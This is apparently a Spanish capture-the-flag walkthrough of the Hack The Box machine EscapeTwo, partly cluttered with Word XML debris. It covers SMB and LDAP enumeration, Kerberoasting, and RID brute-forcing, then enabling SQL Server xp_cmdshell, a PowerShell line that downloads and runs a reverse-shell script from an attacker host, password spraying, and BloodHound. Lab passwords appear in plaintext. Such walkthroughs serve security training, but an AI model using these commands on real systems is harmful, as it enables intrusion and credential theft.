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12763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INICIAMOS HACIENDO ANALISI CON NMAP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nmap -sV -sC -oA EscapeTwo 10.129.2.0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ENCONTRAMOS PUEROT DE SMB Y LDAP ABIERTO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smbclient -L //10.129.2.0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PUEDE CONECTAR ANONIMAMENTE A SMB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Nos conectamos con rpcclient pero no pudimos enumerar usuarios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rpcclient -U "%" 10.129.2.0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enumdomusers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8667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 la herramienta impacket-GetUserSPNs intentamos obtener el hash ya que desde la pagina nos proporcionan usuario y contraseña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1514475" cy="428625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impacket-GetUserSPNs -request -dc-ip 10.129.2.0 sequel.htb/rose:KxEPkKe6R8su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 este obtenemos información pero adelantó que estos hash no se puedes desencriptar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ahora teniendo en cuenta que tenemos usuario y contraseña, podemos enumerar inforamcion del protocolo smb con la herramienta netexec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netexec es una herramienta utilizada en pentesting para interactuar con servicios SMB. Forma parte de la suite CrackMapExec (CME), que es una herramienta multifuncional para probar credenciales y ejecutar comandos en servicios remotos como SMB, RDP, WinRM, entre otros.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subcomando netexec está diseñado específicamente para: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Ejecución remota de comandos: Ejecutar comandos en sistemas Windows a través de servicios como SMB si las credenciales tienen los permisos necesarios.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Enumeración de objetos en Active Directory (AD): Extraer información como usuarios, grupos y otros datos en entornos Windows/AD.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Soporte para técnicas avanzadas: Ejemplo: ataque RID bruteforce para identificar SIDs de usuarios y grupos en un dominio.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utilizando el comando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netexec smb sequel.htb -p 'KxEPkKe6R8su' -u rose --rid-brute |tee output.txt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netexec smb: Indica que usarás el módulo SMB de netexec para interactuar con el servidor de archivos en sequel.htb.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sequel.htb: Nombre del servidor o dominio objetivo.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-p 'KxEPkKe6R8su': Especifica la contraseña del usuario que se usará para autenticarse.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-u rose: Nombre del usuario que se autentica en el servidor.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--rid-brute: Realiza un ataque de enumeración de RIDs (Relative Identifiers) para descubrir usuarios y grupos en el dominio.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tee output.txt: Guarda la salida en un archivo llamado output.txt, mientras también la muestra en pantalla.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esto nos trae información interesante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1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Así que vamos a desglosar un poco esto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SEQUEL: Este es el nombre del dominio al que pertenece el grupo o usuario.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Indica que todos los objetos listados (usuarios y grupos) son parte del dominio SEQUEL, que en este caso es el servidor o el controlador de dominio al que te conectaste.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Sales Department: Es el nombre del grupo dentro del dominio SEQUEL.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Representa un grupo lógico que probablemente está diseñado para incluir a todos los empleados del departamento de ventas.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(SidTypeGroup):Esto indica el tipo de objeto que estás viendo.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SidTypeGroup significa que este objeto es un grupo en Active Directory, no un usuario o un alias.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definicion de chat gpt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&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Nombre del dominio en el que se encuentra el objeto.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SEQUEL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el dominio que controla este objeto.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&lt;OBJECT_NAME&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Nombre del grupo, usuario, alias o recurso.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Department</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> representa un grupo departamental.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&lt;OBJECT_TYPE&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Define el tipo de objeto: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SidTypeGroup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es un grupo en Active Directory.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SidTypeUser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es un usuario individual.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SidTypeAlias</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es un alias para un grupo o recurso.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posibles valores incluyen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SidTypeComputer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (computadora)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SidTypeWellKnownGroup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (grupo conocido,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entender qué es un objeto, primero identifica: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dominio: ¿Pertenece a un entorno que ya conoces? (en este caso, SEQUEL).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del objeto: Indica si es un usuario (nombre personal), un grupo (nombre general o departamental), o algo técnico (DnsAdmins, krbtgt, etc.).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tipo de objeto: Determina su función en Active Directory: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Usuario: Representa una cuenta que puede iniciar sesión.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Grupo: Contiene usuarios y controla permisos.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Alias: Puede ser un sinónimo para otro objeto o grupo.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Computadora: Representa un dispositivo en el dominio.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 smbmap podemos hacer un análisis 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smbmap -H 10.129.87.197 -u rose -p KxEPkKe6R8su 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Hora lo que procedemos  intentar conectarnos smb con el usuario rose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smbclient \\\\sequel.htb\\Users -U rose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43250" cy="2000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no nos proporciona mucha información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iniciamos sesión en la carpeta compartida “accounting department”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14875" cy="2000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al listar la información esta nos muestra dos archivos que procedemos a descargar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 la pagina </w:t>
      </w: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https://jumpshare.com/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podremos abrir estos archivos encontrandonos con la siguiente información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Primer archivo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10001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Segundo archivo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Podemos ver usuarios y contraseñas, hay uno muy interesante que es el usuario sa, que parece ser usuario de base de datos.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 la herramienta impacket-mssqlclient podremos intentar hacer una conexion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impacket-mssqlclient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sa@sequel.htb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2800350" cy="20955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 tenemos una conexión exitosa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Ya que tenemos inicio de sesion en sql server podremos ejecutar los comando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 sp_configure 'show advanced option', '1';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RECONFIGURE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sp_configure 'xp_cmdshell', 1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RECONFIGURE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 xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "&amp; {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.136:8001/Invoke-PowerShellTcp.ps1'')}"'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xp_cmdshell "whoami"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Procedo a explicar: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Los dos primeros comando habilitar opciones avanzadas en SQL Server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EXEC sp_configure 'show advanced option', '1';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RECONFIGURE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los otros dos comandos que siguen activan la funcionalidad xp_cmdshell, que permite ejecutar comandos del sistema operativo desde SQL Server.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064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Y por último el comando EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "&amp; {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.136:8001/Invoke-PowerShellTcp.ps1'')}"'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Ejecuta un comando de PowerShell desde SQL Server usando xp_cmdshell.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Descarga y ejecuta el script Invoke-PowerShellTcp.ps1 desde http://10.10.14.136:8001, probablemente creando una reverse shell hacia el servidor atacante.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Para esto entonces tendremos que configurar nuestro servidor python en el puerto 8001 y poner a escuchar nuestro netcat en el puerto que se configura en el archivo, en este caso el puerto 4444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Una vez corrió esto, el archivo Invoke-PowerShellTcp.ps1 se cargará y se ejecutara dandonos una shell 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24450" cy="15240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38425" cy="3524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tenemos acceso con usuario sql_svc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Ahora navegando un poco en los archivos, en la ruta C:\sql2019\ExpressAdv_ENU, encontramos el archivo sql-Configuration.INI el cual tiene una contraseña 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14775" cy="386715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La contraseña encontrada la verificaremos para saber a que usuario pertenece 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netexec winrm sequel.htb -u usernames.txt  -p 'WqSZAF6CysDQbGb3'  --continue-on-success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78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Encontrando que esta le pertenece a el usuario ryan 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Asi que podremos hacer conexion con evil-winRM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evil-winrm -i sequel.htb -u ryan -p WqSZAF6CysDQbGb3 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Y tenemos acceso a la maquina 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ahora para escalar privilegios utilizaremos la herramienta de bloodhound para validar el comportarimeto de usuario ryan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con esto descargamos un zip para después descomprimirlo y validar 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bloodhound-python -d sequel.htb -v --zip -c ALL -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -dc dc01.sequel.htb -ns 10.129.87.197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305050" cy="17145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Iniciamos la herramienta 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sudo neo4j start  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bloodhound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empecemos el análisis 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yperlink" Target="mailto:sa@sequel.htb" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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0.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jumpshare.com/" TargetMode="External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